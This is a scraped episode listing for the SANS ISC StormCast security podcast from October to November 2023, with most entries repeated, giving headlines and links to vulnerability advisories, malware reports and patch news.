Redline Dropped Through MSIX Package https://isc.sans.edu/diary/Redline%20Dropped%20Through%20MSIX%20Package/30404 ChatGPT Code Interpreter Security Hole https://www.tomshardware.com/news/chatgpt-code-interpreter-security-hole Directory Traversal in Reactor Netty CVE-2023-34062 https://spring.io/security/cve-2023-34062 Aruba Networking Product Vulnerabilities https://www.arubanetworks.com/assets/alert/ARUBA-PSA-2023-017.txt HARArmor https://harmor.dev/
11/16/20235 minutes, 57 seconds
Episode Artwork

ISC StormCast for Wednesday, November 15th, 2023

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20November%202023/30400 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html Intel CPU Glitch State Patch https://lock.cmpxchg8b.com/reptar.html https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00950.html
11/15/20237 minutes, 10 seconds
Episode Artwork

ISC StormCast for Wednesday, November 15th, 2023

Microsoft Patches https://isc.sans.edu/diary/Microsoft%20Patch%20Tuesday%20November%202023/30400 Adobe Updates https://helpx.adobe.com/security/security-bulletin.html Intel CPU Glitch State Patch https://lock.cmpxchg8b.com/reptar.html https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00950.html
11/15/20237 minutes, 10 seconds
Episode Artwork

ISC StormCast for Tuesday, November 14th, 2023

Noticing command control channels by reviewing DNS protocols https://isc.sans.edu/diary/Noticing%20command%20and%20control%20channels%20by%20reviewing%20DNS%20protocols/30396 Passive SSH Key Compromise via Lattices https://eprint.iacr.org/2023/1711.pdf Juniper Vulnerabilities Exploited https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US
11/14/20235 minutes, 4 seconds
Episode Artwork

ISC StormCast for Tuesday, November 14th, 2023

Noticing command control channels by reviewing DNS protocols https://isc.sans.edu/diary/Noticing%20command%20and%20control%20channels%20by%20reviewing%20DNS%20protocols/30396 Passive SSH Key Compromise via Lattices https://eprint.iacr.org/2023/1711.pdf Juniper Vulnerabilities Exploited https://supportportal.juniper.net/s/article/2023-08-Out-of-Cycle-Security-Bulletin-Junos-OS-SRX-Series-and-EX-Series-Multiple-vulnerabilities-in-J-Web-can-be-combined-to-allow-a-preAuth-Remote-Code-Execution?language=en_US
11/14/20235 minutes, 4 seconds
Episode Artwork

ISC StormCast for Monday, November 13th, 2023

Routers Targeted for Gafgyt Botnet https://isc.sans.edu/forums/diary/Routers%20Targeted%20for%20Gafgyt%20Botnet%20%5BGuest%20Diary%5D/30390/ ScreenConnect used to Attack Healthcare https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack Fake Skills Assessment Portals Associated with Sapphire Sleet https://twitter.com/MsftSecIntel/status/1722316019920728437 OpenVPN Access Server Vulnerabilities https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
11/13/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Monday, November 13th, 2023

Routers Targeted for Gafgyt Botnet https://isc.sans.edu/forums/diary/Routers%20Targeted%20for%20Gafgyt%20Botnet%20%5BGuest%20Diary%5D/30390/ ScreenConnect used to Attack Healthcare https://www.huntress.com/blog/third-party-pharmaceutical-vendor-linked-to-pharmacy-and-health-clinic-cyberattack Fake Skills Assessment Portals Associated with Sapphire Sleet https://twitter.com/MsftSecIntel/status/1722316019920728437 OpenVPN Access Server Vulnerabilities https://openvpn.net/security-advisory/access-server-security-update-cve-2023-46849-cve-2023-46850/
11/13/20235 minutes, 46 seconds
Episode Artwork

ISC StormCast for Friday, November 10th, 2023

Visual Examples of Code Injection https://isc.sans.edu/diary/Visual%20Examples%20of%20Code%20Injection/30388 SysAid Exploited by Cl0p Ransomware (CVE-2023-47246) https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification WS_FTP Server Update CVE-2023-42659 https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-November-2023 Malvertiser copies PC news site to delivery infostealer https://www.malwarebytes.com/blog/threat-intelligence/2023/11/malvertiser-copies-pc-news-site-to-deliver-infostealer pyArrow/Apache Arrow Vulnerability https://lists.apache.org/thread/yhy7tdfjf9hrl9vfrtzo8p2cyjq87v7n
11/10/20235 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, November 10th, 2023

Visual Examples of Code Injection https://isc.sans.edu/diary/Visual%20Examples%20of%20Code%20Injection/30388 SysAid Exploited by Cl0p Ransomware (CVE-2023-47246) https://www.sysaid.com/blog/service-desk/on-premise-software-security-vulnerability-notification WS_FTP Server Update CVE-2023-42659 https://community.progress.com/s/article/WS-FTP-Server-Service-Pack-November-2023 Malvertiser copies PC news site to delivery infostealer https://www.malwarebytes.com/blog/threat-intelligence/2023/11/malvertiser-copies-pc-news-site-to-deliver-infostealer pyArrow/Apache Arrow Vulnerability https://lists.apache.org/thread/yhy7tdfjf9hrl9vfrtzo8p2cyjq87v7n
11/10/20235 minutes, 25 seconds
Episode Artwork

ISC StormCast for Thursday, November 9th, 2023

Example of a Phishing Campaing Project File https://isc.sans.edu/diary/Example%20of%20Phishing%20Campaign%20Project%20File/30384 Cryptomining with Microsoft Azure Automation Services https://www.safebreach.com/blog/cryptocurrency-miner-microsoft-azure Windows 11 Insider Changing Firewall Behaviour https://blogs.windows.com/windows-insider/2023/11/08/announcing-windows-11-insider-preview-build-25992-canary-channel/ CISA Adds SLP Vulnerability to Known Exploited Vulnerabilty List https://www.cisa.gov/news-events/alerts/2023/11/08/cisa-adds-one-known-exploited-vulnerability-catalog
11/9/20235 minutes, 21 seconds
Episode Artwork

ISC StormCast for Thursday, November 9th, 2023

Example of a Phishing Campaing Project File https://isc.sans.edu/diary/Example%20of%20Phishing%20Campaign%20Project%20File/30384 Cryptomining with Microsoft Azure Automation Services https://www.safebreach.com/blog/cryptocurrency-miner-microsoft-azure Windows 11 Insider Changing Firewall Behaviour https://blogs.windows.com/windows-insider/2023/11/08/announcing-windows-11-insider-preview-build-25992-canary-channel/ CISA Adds SLP Vulnerability to Known Exploited Vulnerabilty List https://www.cisa.gov/news-events/alerts/2023/11/08/cisa-adds-one-known-exploited-vulnerability-catalog
11/9/20235 minutes, 21 seconds
Episode Artwork

ISC StormCast for Wednesday, November 8th, 2023

What's Normal: New uses of DNS, Discovery of Designated Resolvers (DDR) https://isc.sans.edu/diary/What%27s%20Normal%3A%20New%20uses%20of%20DNS%2C%20Discovery%20of%20Designated%20Resolvers%20%28DDR%29/30380 BlueNoroff macOS Malware https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ Emphasizing Security by Default wiht Advanced Microsoft Authenticator Features https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/emphasizing-security-by-default-with-advanced-microsoft/ba-p/3773130
11/8/20236 minutes, 22 seconds
Episode Artwork

ISC StormCast for Wednesday, November 8th, 2023

What's Normal: New uses of DNS, Discovery of Designated Resolvers (DDR) https://isc.sans.edu/diary/What%27s%20Normal%3A%20New%20uses%20of%20DNS%2C%20Discovery%20of%20Designated%20Resolvers%20%28DDR%29/30380 BlueNoroff macOS Malware https://www.jamf.com/blog/bluenoroff-strikes-again-with-new-macos-malware/ Emphasizing Security by Default wiht Advanced Microsoft Authenticator Features https://techcommunity.microsoft.com/t5/microsoft-entra-azure-ad-blog/emphasizing-security-by-default-with-advanced-microsoft/ba-p/3773130
11/8/20236 minutes, 22 seconds
Episode Artwork

ISC StormCast for Tuesday, November 7th, 2023

Confluence CVe-2023-22518 Exploited https://isc.sans.edu/diary/Exploit%20Activity%20for%20CVE-2023-22518%2C%20Atlassian%20Confluence%20Data%20Center%20and%20Server/30376 Google Threat Horizons Report https://services.google.com/fh/files/blogs/gcat_threathorizons_full_oct2023.pdf https://www.sans.edu/cyber-research/bookmark-bruggling-novel-data-exfiltration-with-brugglemark/ Veeam Update https://www.veeam.com/kb4508 QNAP Update https://www.qnap.com/de-de/security-advisory/qsa-23-35
11/7/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, November 7th, 2023

Confluence CVe-2023-22518 Exploited https://isc.sans.edu/diary/Exploit%20Activity%20for%20CVE-2023-22518%2C%20Atlassian%20Confluence%20Data%20Center%20and%20Server/30376 Google Threat Horizons Report https://services.google.com/fh/files/blogs/gcat_threathorizons_full_oct2023.pdf https://www.sans.edu/cyber-research/bookmark-bruggling-novel-data-exfiltration-with-brugglemark/ Veeam Update https://www.veeam.com/kb4508 QNAP Update https://www.qnap.com/de-de/security-advisory/qsa-23-35
11/7/20236 minutes, 11 seconds
Episode Artwork

ISC StormCast for Monday, November 6th, 2023

New Microsoft Exchange Zero Days https://www.bleepingcomputer.com/news/microsoft/new-microsoft-exchange-zero-days-allow-rce-data-theft-attacks/ StripedFly: Perennially Flying under the Radar https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/ Send My: Sending Data over Apple's Find My Network https://github.com/positive-security/send-my
11/6/20237 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, November 6th, 2023

New Microsoft Exchange Zero Days https://www.bleepingcomputer.com/news/microsoft/new-microsoft-exchange-zero-days-allow-rce-data-theft-attacks/ StripedFly: Perennially Flying under the Radar https://securelist.com/stripedfly-perennially-flying-under-the-radar/110903/ Send My: Sending Data over Apple's Find My Network https://github.com/positive-security/send-my
11/6/20237 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, November 3rd, 2023

Quick Tip for Artificially Inflated PE Files https://isc.sans.edu/diary/Quick%20Tip%20For%20Artificially%20Inflated%20PE%20Files/30370 Apache ActiveMQ Flaw Exploited https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/ Critical Firepower Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-29MP49hN Dozens of npm Packages Caught Attempting to Deploy Reverse Shell https://blog.phylum.io/dozens-of-npm-packages-caught-attempting-to-deploy-reverse-shell/
11/3/20235 minutes, 22 seconds
Episode Artwork

ISC StormCast for Friday, November 3rd, 2023

Quick Tip for Artificially Inflated PE Files https://isc.sans.edu/diary/Quick%20Tip%20For%20Artificially%20Inflated%20PE%20Files/30370 Apache ActiveMQ Flaw Exploited https://activemq.apache.org/security-advisories.data/CVE-2023-46604-announcement.txt https://www.rapid7.com/blog/post/2023/11/01/etr-suspected-exploitation-of-apache-activemq-cve-2023-46604/ Critical Firepower Vulnerability https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fmc-cmd-inj-29MP49hN Dozens of npm Packages Caught Attempting to Deploy Reverse Shell https://blog.phylum.io/dozens-of-npm-packages-caught-attempting-to-deploy-reverse-shell/
11/3/20235 minutes, 22 seconds
Episode Artwork

ISC StormCast for Thursday, November 2nd, 2023

Malware Dropped Through a ZPAQ Archive https://isc.sans.edu/forums/diary/Malware%20Dropped%20Through%20a%20ZPAQ%20Archive/30366/ CVSS 4.0 Now Official https://www.first.org/cvss/v4-0/index.html MOZI Botnet Killswitch https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/ URL Shorteners in .us https://securityonline.info/infoblox-uncovers-malicious-wave-in-us-domain-registrations/ Impersonating Slack Users https://falconspy.org/redteam/tradecraft/2023/10/05/2023-10-05-Slack-Impersonation.html
11/2/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Thursday, November 2nd, 2023

Malware Dropped Through a ZPAQ Archive https://isc.sans.edu/forums/diary/Malware%20Dropped%20Through%20a%20ZPAQ%20Archive/30366/ CVSS 4.0 Now Official https://www.first.org/cvss/v4-0/index.html MOZI Botnet Killswitch https://www.welivesecurity.com/en/eset-research/who-killed-mozi-finally-putting-the-iot-zombie-botnet-in-its-grave/ URL Shorteners in .us https://securityonline.info/infoblox-uncovers-malicious-wave-in-us-domain-registrations/ Impersonating Slack Users https://falconspy.org/redteam/tradecraft/2023/10/05/2023-10-05-Slack-Impersonation.html
11/2/20235 minutes, 43 seconds
Episode Artwork

ISC StormCast for Wednesday, November 1st, 2023

Multiple Layers of Anti-Sandboxing Techniques https://isc.sans.edu/diary/Multiple%20Layers%20of%20Anti-Sandboxing%20Techniques/30362 CVE-2023-22518 Improper Authorization Vulnerability in Confluence Data Center and Server https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html Malvertisement Promotes Malicious PyCharm Version https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza Thorn SFTP Gateway Java Deserialization RCE CVE-2016-1000027 CVE-2023-47174 https://help.thorntech.com/docs/sftp-gateway-gcp-3.0/gcp-java-deserialization-rce/
11/1/20234 minutes, 11 seconds
Episode Artwork

ISC StormCast for Wednesday, November 1st, 2023

Multiple Layers of Anti-Sandboxing Techniques https://isc.sans.edu/diary/Multiple%20Layers%20of%20Anti-Sandboxing%20Techniques/30362 CVE-2023-22518 Improper Authorization Vulnerability in Confluence Data Center and Server https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html Malvertisement Promotes Malicious PyCharm Version https://www.malwarebytes.com/blog/threat-intelligence/2023/10/malvertising-via-dynamic-search-ads-delivers-malware-bonanza Thorn SFTP Gateway Java Deserialization RCE CVE-2016-1000027 CVE-2023-47174 https://help.thorntech.com/docs/sftp-gateway-gcp-3.0/gcp-java-deserialization-rce/
11/1/20234 minutes, 11 seconds
Episode Artwork

ISC StormCast for Tuesday, October 31st, 2023

Flying under the Radar: The Privacy Impact of Mulicast DNS https://isc.sans.edu/forums/diary/Flying%20under%20the%20Radar%3A%20The%20Privacy%20Impact%20of%20multicast%20DNS/30358/ Kubernetes ingress-nginx vulnerability https://github.com/kubernetes/ingress-nginx/issues/10571 Google Chrome HTTPS Upgrade https://github.com/dadrian/https-upgrade/blob/main/explainer.md Wordpad POC CVE-2023-36563 https://www.dillonfrankesecurity.com/posts/cve-2023-36563-wordpad-analysis/
10/31/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Tuesday, October 31st, 2023

Flying under the Radar: The Privacy Impact of Mulicast DNS https://isc.sans.edu/forums/diary/Flying%20under%20the%20Radar%3A%20The%20Privacy%20Impact%20of%20multicast%20DNS/30358/ Kubernetes ingress-nginx vulnerability https://github.com/kubernetes/ingress-nginx/issues/10571 Google Chrome HTTPS Upgrade https://github.com/dadrian/https-upgrade/blob/main/explainer.md Wordpad POC CVE-2023-36563 https://www.dillonfrankesecurity.com/posts/cve-2023-36563-wordpad-analysis/
10/31/20236 minutes, 14 seconds
Episode Artwork

ISC StormCast for Monday, October 30th, 2023

Size Matters for Many Security Controls https://isc.sans.edu/diary/Size%20Matters%20for%20Many%20Security%20Controls/30352 Spam or Phishing? Looking for Credentials and Passwords https://isc.sans.edu/diary/Spam%20or%20Phishing%3F%20Looking%20for%20Credentials%20%26%20Passwords/30354 iOS Leaks MAC Address https://www.youtube.com/watch?v=T3XABxNogTA Zero Day Initiative Pwn2Own Summary https://www.zerodayinitiative.com/blog/2023/10/24/pwn2own-toronto-2023-day-one-results https://www.zerodayinitiative.com/blog/2023/10/25/pwn2own-toronto-2023-day-two-results https://www.zerodayinitiative.com/blog/2023/10/26/pwn2own-toronto-2023-day-three-results Microsoft Octo Tempest Writeup https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/
10/30/20236 minutes, 7 seconds
Episode Artwork

ISC StormCast for Monday, October 30th, 2023

Size Matters for Many Security Controls https://isc.sans.edu/diary/Size%20Matters%20for%20Many%20Security%20Controls/30352 Spam or Phishing? Looking for Credentials and Passwords https://isc.sans.edu/diary/Spam%20or%20Phishing%3F%20Looking%20for%20Credentials%20%26%20Passwords/30354 iOS Leaks MAC Address https://www.youtube.com/watch?v=T3XABxNogTA Zero Day Initiative Pwn2Own Summary https://www.zerodayinitiative.com/blog/2023/10/24/pwn2own-toronto-2023-day-one-results https://www.zerodayinitiative.com/blog/2023/10/25/pwn2own-toronto-2023-day-two-results https://www.zerodayinitiative.com/blog/2023/10/26/pwn2own-toronto-2023-day-three-results Microsoft Octo Tempest Writeup https://www.microsoft.com/en-us/security/blog/2023/10/25/octo-tempest-crosses-boundaries-to-facilitate-extortion-encryption-and-destruction/
10/30/20236 minutes, 7 seconds
Episode Artwork

ISC StormCast for Friday, October 27th, 2023

Adventures in Validating IPv4 Addresses https://isc.sans.edu/forums/diary/Adventures%20in%20Validating%20IPv4%20Addresses/30348/ BIG-IP Configuration Utility Unauthenticated Remote Code Execution https://my.f5.com/manage/s/article/K000137353 https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/ iLeakage Vulnerability https://ileakage.com/
10/27/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Friday, October 27th, 2023

Adventures in Validating IPv4 Addresses https://isc.sans.edu/forums/diary/Adventures%20in%20Validating%20IPv4%20Addresses/30348/ BIG-IP Configuration Utility Unauthenticated Remote Code Execution https://my.f5.com/manage/s/article/K000137353 https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/ iLeakage Vulnerability https://ileakage.com/
10/27/20236 minutes, 3 seconds
Episode Artwork

ISC StormCast for Thursday, October 26th, 2023

Apple Updates https://isc.sans.edu/diary/Apple%20Patches%20Everything.%20Releases%20iOS%2017.1%2C%20MacOS%2014.1%20and%20updates%20for%20older%20versions%20fixing%20exploited%20vulnerability/30344 Confluence Server Scans CVE-2023-22515 https://isc.sans.edu/diary/30342 Critical VMVware vCenter Patch CVE-2023-34048 https://www.vmware.com/security/advisories/VMSA-2023-0023.html
10/26/20236 minutes, 6 seconds
Episode Artwork

ISC StormCast for Thursday, October 26th, 2023

Apple Updates https://isc.sans.edu/diary/Apple%20Patches%20Everything.%20Releases%20iOS%2017.1%2C%20MacOS%2014.1%20and%20updates%20for%20older%20versions%20fixing%20exploited%20vulnerability/30344 Confluence Server Scans CVE-2023-22515 https://isc.sans.edu/diary/30342 Critical VMVware vCenter Patch CVE-2023-34048 https://www.vmware.com/security/advisories/VMSA-2023-0023.html
10/26/20236 minutes, 6 seconds
Episode Artwork

ISC StormCast for Wednesday, October 25th, 2023

Samsung Messages and Samsung Wallet briefly marked as 'harmful' by Google https://9to5google.com/2023/10/23/samsung-messages-wallet-harmful-app-google/ OAuth Hijacking https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts Microsoft Exchange Server CVe-2023-36745 PoC https://n1k0la-t.github.io/2023/10/24/Microsoft-Exchange-Server-CVE-2023-36745/ Citrix Bleed PoC CVe-2023-4966 https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966 VMWare VRealize Exploit CVE-2023-34051 CVE0-2023-34052 https://www.vmware.com/security/advisories/VMSA-2023-0021.html
10/25/20236 minutes, 24 seconds
Episode Artwork

ISC StormCast for Wednesday, October 25th, 2023

Samsung Messages and Samsung Wallet briefly marked as 'harmful' by Google https://9to5google.com/2023/10/23/samsung-messages-wallet-harmful-app-google/ OAuth Hijacking https://salt.security/blog/oh-auth-abusing-oauth-to-take-over-millions-of-accounts Microsoft Exchange Server CVe-2023-36745 PoC https://n1k0la-t.github.io/2023/10/24/Microsoft-Exchange-Server-CVE-2023-36745/ Citrix Bleed PoC CVe-2023-4966 https://www.assetnote.io/resources/research/citrix-bleed-leaking-session-tokens-with-cve-2023-4966 VMWare VRealize Exploit CVE-2023-34051 CVE0-2023-34052 https://www.vmware.com/security/advisories/VMSA-2023-0021.html
10/25/20236 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, October 24th, 2023

Apple TV IPv6 DoS https://isc.sans.edu/diary/How%20an%20AppleTV%20may%20take%20down%20your%20%28%23IPv6%29%20network/30336 Squid Patches https://github.com/squid-cache/squid/security/advisories Critical Citrix Update https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/ Cisco Vulnerablity Updates CVE-2023-20198 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
10/24/20236 minutes, 24 seconds
Episode Artwork

ISC StormCast for Tuesday, October 24th, 2023

Apple TV IPv6 DoS https://isc.sans.edu/diary/How%20an%20AppleTV%20may%20take%20down%20your%20%28%23IPv6%29%20network/30336 Squid Patches https://github.com/squid-cache/squid/security/advisories Critical Citrix Update https://www.netscaler.com/blog/news/cve-2023-4966-critical-security-update-now-available-for-netscaler-adc-and-netscaler-gateway/ Cisco Vulnerablity Updates CVE-2023-20198 https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z
10/24/20236 minutes, 24 seconds
Episode Artwork

ISC StormCast for Monday, October 23rd, 2023

base64dump.py Handles More Encodings Than Just BASE64 https://isc.sans.edu/diary/base64dump.py%20Handles%20More%20Encodings%20Than%20Just%20BASE64/30332 Stealing OAuth Tokens via Open Redirects https://eval.blog/research/microsoft-account-token-leaks-in-harvest/ VMWare Patches https://www.vmware.com/security/advisories.html Solarwinds Patches https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-1_release_notes.htm
10/23/20236 minutes, 39 seconds
Episode Artwork

ISC StormCast for Monday, October 23rd, 2023

base64dump.py Handles More Encodings Than Just BASE64 https://isc.sans.edu/diary/base64dump.py%20Handles%20More%20Encodings%20Than%20Just%20BASE64/30332 Stealing OAuth Tokens via Open Redirects https://eval.blog/research/microsoft-account-token-leaks-in-harvest/ VMWare Patches https://www.vmware.com/security/advisories.html Solarwinds Patches https://documentation.solarwinds.com/en/success_center/arm/content/release_notes/arm_2023-2-1_release_notes.htm
10/23/20236 minutes, 39 seconds
Episode Artwork

ISC StormCast for Friday, October 20th, 2023

Honeypot Update https://github.com/DShield-ISC/dshield/blob/main/README.md Malicious Keepass Ads https://www.malwarebytes.com/blog/threat-intelligence/2023/10/clever-malvertising-attack-uses-punycode-to-look-like-legitimate-website Malicious JavaScript in Smart Contracts https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
10/20/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Friday, October 20th, 2023

Honeypot Update https://github.com/DShield-ISC/dshield/blob/main/README.md Malicious Keepass Ads https://www.malwarebytes.com/blog/threat-intelligence/2023/10/clever-malvertising-attack-uses-punycode-to-look-like-legitimate-website Malicious JavaScript in Smart Contracts https://labs.guard.io/etherhiding-hiding-web2-malicious-code-in-web3-smart-contracts-65ea78efad16
10/20/20236 minutes, 37 seconds
Episode Artwork

ISC StormCast for Thursday, October 19th, 2023

Hiding in Hex https://isc.sans.edu/diary/Hiding%20in%20Hex/30322 Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2023.html Citrix Vulnerability Exploited CVE-2023-4966 https://www.mandiant.com/resources/blog/remediation-netscaler-adc-gateway-cve-2023-4966 Exposed Jupyter Notebooks Exploited https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/
10/19/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Thursday, October 19th, 2023

Hiding in Hex https://isc.sans.edu/diary/Hiding%20in%20Hex/30322 Oracle Quarterly Critical Patch Update https://www.oracle.com/security-alerts/cpuoct2023.html Citrix Vulnerability Exploited CVE-2023-4966 https://www.mandiant.com/resources/blog/remediation-netscaler-adc-gateway-cve-2023-4966 Exposed Jupyter Notebooks Exploited https://www.cadosecurity.com/qubitstrike-an-emerging-malware-campaign-targeting-jupyter-notebooks/
10/19/20235 minutes, 41 seconds
Episode Artwork

ISC StormCast for Wednesday, October 18th, 2023

Changes to SMS Delivery and How it Effects MFA and Phishing https://isc.sans.edu/diary/Changes%20to%20SMS%20Delivery%20and%20How%20it%20Effects%20MFA%20and%20Phishing/30320 Fake Traffic Tickets with QR Code https://twitter.com/polizeiberlin/status/1713867011837567411 Synology NAS DSM Account Takeover: Not Random Randomnumbers https://claroty.com/team82/research/synology-nas-dsm-account-takeover-when-random-is-not-secure Milesight Routers CVe-2023-43261 https://github.com/win3zz/CVE-2023-43261
10/18/20236 minutes, 46 seconds
Episode Artwork

ISC StormCast for Wednesday, October 18th, 2023

Changes to SMS Delivery and How it Effects MFA and Phishing https://isc.sans.edu/diary/Changes%20to%20SMS%20Delivery%20and%20How%20it%20Effects%20MFA%20and%20Phishing/30320 Fake Traffic Tickets with QR Code https://twitter.com/polizeiberlin/status/1713867011837567411 Synology NAS DSM Account Takeover: Not Random Randomnumbers https://claroty.com/team82/research/synology-nas-dsm-account-takeover-when-random-is-not-secure Milesight Routers CVe-2023-43261 https://github.com/win3zz/CVE-2023-43261
10/18/20236 minutes, 46 seconds
Episode Artwork

ISC StormCast for Tuesday, October 17th, 2023

Are Typos Still relevant As An Indicator of Phishing https://isc.sans.edu/diary/Are+typos+still+relevant+as+an+indicator+of+phishing/30316 Active Exploitation of Cisco ISO XE Software Web Management User Interface Vuln https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/ Mail traffic to cancelled domain names https://www.sidn.nl/en/nl-domain-name/mail-traffic-to-cancelled-domain-names SAMBA Update https://www.samba.org/samba/history/security.html
10/17/20235 minutes, 28 seconds
Episode Artwork

ISC StormCast for Tuesday, October 17th, 2023

Are Typos Still relevant As An Indicator of Phishing https://isc.sans.edu/diary/Are+typos+still+relevant+as+an+indicator+of+phishing/30316 Active Exploitation of Cisco ISO XE Software Web Management User Interface Vuln https://blog.talosintelligence.com/active-exploitation-of-cisco-ios-xe-software/ Mail traffic to cancelled domain names https://www.sidn.nl/en/nl-domain-name/mail-traffic-to-cancelled-domain-names SAMBA Update https://www.samba.org/samba/history/security.html
10/17/20235 minutes, 28 seconds
Episode Artwork

ISC StormCast for Monday, October 16th, 2023

What's Normal: Odd Mac Addresses https://isc.sans.edu/forums/diary/What's%20Normal%3A%20MAC%20Addresses/30310/ Domain Name Used as Password Captured by DShield Sensor https://isc.sans.edu/forums/diary/Domain%20Name%20Used%20as%20Password%20Captured%20by%20DShield%20Sensor/30312/ PoC Exploit for CVE-2023-41993 https://github.com/po6ix/POC-for-CVE-2023-41993 AvosLocker Ransomware Details https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf DarkGate Spreading via Skype and Teams https://www.trendmicro.com/en_ph/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html
10/16/20235 minutes, 25 seconds
Episode Artwork

ISC StormCast for Monday, October 16th, 2023

What's Normal: Odd Mac Addresses https://isc.sans.edu/forums/diary/What's%20Normal%3A%20MAC%20Addresses/30310/ Domain Name Used as Password Captured by DShield Sensor https://isc.sans.edu/forums/diary/Domain%20Name%20Used%20as%20Password%20Captured%20by%20DShield%20Sensor/30312/ PoC Exploit for CVE-2023-41993 https://github.com/po6ix/POC-for-CVE-2023-41993 AvosLocker Ransomware Details https://www.cisa.gov/sites/default/files/2023-10/aa23-284a-joint-csa-stopransomware-avoslocker-ransomware-update.pdf DarkGate Spreading via Skype and Teams https://www.trendmicro.com/en_ph/research/23/j/darkgate-opens-organizations-for-attack-via-skype-teams.html
10/16/20235 minutes, 25 seconds
Episode Artwork

ISC StormCast for Friday, October 13th, 2023

SeroXen RAT in Typosquatted NuGet Packages https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/ Hexadecimal IP Addresses https://asec.ahnlab.com/en/57635/ Juniper Vulnerabilities https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&numberOfResults=50&f:ctype=[Security%20Advisories] Unpatched Squid Vulnerabilities https://joshua.hu/squid-security-audit-35-0days-45-exploits BSIDES Jacksonville https://bsidesjax.org
10/13/20236 minutes, 13 seconds
Episode Artwork

ISC StormCast for Friday, October 13th, 2023

SeroXen RAT in Typosquatted NuGet Packages https://blog.phylum.io/phylum-discovers-seroxen-rat-in-typosquatted-nuget-package/ Hexadecimal IP Addresses https://asec.ahnlab.com/en/57635/ Juniper Vulnerabilities https://supportportal.juniper.net/s/global-search/%40uri?language=en_US#sort=%40sfcec_community_publish_date_formula__c%20descending&numberOfResults=50&f:ctype=[Security%20Advisories] Unpatched Squid Vulnerabilities https://joshua.hu/squid-security-audit-35-0days-45-exploits BSIDES Jacksonville https://bsidesjax.org
10/13/20236 minutes, 13 seconds
Episode Artwork

ISC StormCast for Thursday, October 12th, 2023

CVE-2023-22515 Activately Exploited https://confluence.atlassian.com/security/cve-2023-22515-privilege-escalation-vulnerability-in-confluence-data-center-and-server-1295682276.html curl SOCKS5 oversized hostname vulnerability CVe-2023-38545 https://isc.sans.edu/diary/CVE-2023-38545%3A%20curl%20SOCKS5%20oversized%20hostname%20vulnerability.%20How%20bad%20is%20it%3F/30304 Adobe Acrobat Vulnerablity Actively Exploited CVE-2023-21608 https://www.cisa.gov/news-events/alerts/2023/10/10/cisa-adds-five-known-vulnerabilities-catalog Google Makes Passkey the Default https://blog.google/technology/safety-security/passkeys-default-google-accounts/ VBScript Deprecated from Windows https://learn.microsoft.com/en-us/windows/whats-new/deprecated-features
10/12/20235 minutes, 28 seconds
Episode Artwork

ISC StormCast for Thursday, October 12th, 2023

